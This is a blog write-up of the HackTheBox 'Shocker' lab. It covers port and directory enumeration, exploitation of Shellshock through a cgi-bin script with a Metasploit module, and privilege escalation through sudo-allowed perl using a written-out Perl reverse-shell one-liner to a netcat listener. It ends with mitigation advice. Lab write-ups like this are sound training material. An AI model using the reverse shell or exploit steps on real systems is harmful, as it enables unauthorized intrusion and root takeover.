Thumbnail: gravatar

HackTheBox 'Shocker' writeup

by on under writeups
4 minute read


Getting Shells on Shocker


A Quick HackTheBox (HTB) writeup on ‘shocker’




Unfortunately, it looks like the first time I ran through this box, I got frustrated trying to get the exploit to work manually, so ended up being lazy and falling back on metasploit. I will go ahead and publish the writeup with my use of msf, but if I find my notes on how I did it manually, or run through it again, I will update this writeup.

Host Information    
Hostname Operating System HTB Difficulty Rating
Shocker Linux Easy


view all writeups here






╰─➤  sudo nmap -sS -sV -O -oA shocker
[sudo] password for initinfosec: 
Starting Nmap 7.80 ( ) at 2019-12-23 10:47 CST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 998 closed ports
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds

Based on the information provided by apache and ssh, and after some Googling on the versions provided by nmap, it’s likely that this system is Ubuntu Xenial.


further enumeration with dirb


Noticing port 80 is open, I run dirb against the site:

╰─➤  dirb -o shocker_dirb_results.txt                        130 ↵

DIRB v2.22    
By The Dark Raver

OUTPUT_FILE: shocker_dirb_results.txt
START_TIME: Mon Dec 23 10:50:11 2019
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:403|SIZE:294)                                    
+ (CODE:200|SIZE:137)                                  
+ (CODE:403|SIZE:299)                               
END_TIME: Mon Dec 23 10:53:52 2019

cgi-bin and server-status I did not have access to. index.html, as expected, is the home page. There’s just an image that says don’t bug me, with nothing hidden in the source, so appears to be a dead end.

Since cgi-bin often houses scripts that apache can pass off to other parts of the OS, i’ll run the script again, searching for extensions sh, pl, looking for script files on the OS that are tied to the URI:

dirb -X .sh,.pl -o dirb_cgi-bin.txt            130 ↵

DIRB v2.22    
By The Dark Raver

OUTPUT_FILE: dirb_cgi-bin.txt
START_TIME: Mon Dec 23 15:29:06 2019
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.pl) | (.sh)(.pl) [NUM = 2]


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:119)                             
END_TIME: Mon Dec 23 15:36:19 2019

Viewing the one file, file that was found, we see the following:

Content-Type: text/plain

Just an uptime test script

 16:39:27 up 50 min,  0 users,  load average: 0.00, 0.00, 0.00

exploitation of shellsock via metasploit


using the shellshock exploit in msf, I set the following:

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/
targeturi => /cgi-bin/
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

I get a user shell:

meterpreter > shell
Process 11628 created.
Channel 1 created.
ls -ltr
total 4
-rwxr-xr-x 1 root root 113 Sep 22  2017

running sudo -l I see that I have perl run as root with sudo nopasswd settings.

I will pass a perl command to try and spawn a reverse shell and try to gain a foothold in the system. (I grabbed this from pentestmonkey’s reverse shell cheat sheet):

sudo perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

I start a listener on port 1234, and I catch the shell:

sudo nc -lvp 1234
Connection from
/bin/sh: 0: can't access tty; job control turned off
# whoami

Awesome, the shellsock exploit gave us ‘one-shot’ root level access. From here we can grab both the user and root flags from their respective home directories.


Potential mitigations

  • Patch the Linux server bash program so as not to be vulnerable to ShellShock
  • If possible, narrow down the amount of information httpd and OpenSSH give out externally via banner grab (an excess of banner/version information makes it easier for an attacker to better tailor attacks)
  • Avoid blanket sudo nopasswd privileges with perl - try to further refine the sudo privledges if possible.


That’s it for this box, thanks again, hope it was useful.



hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus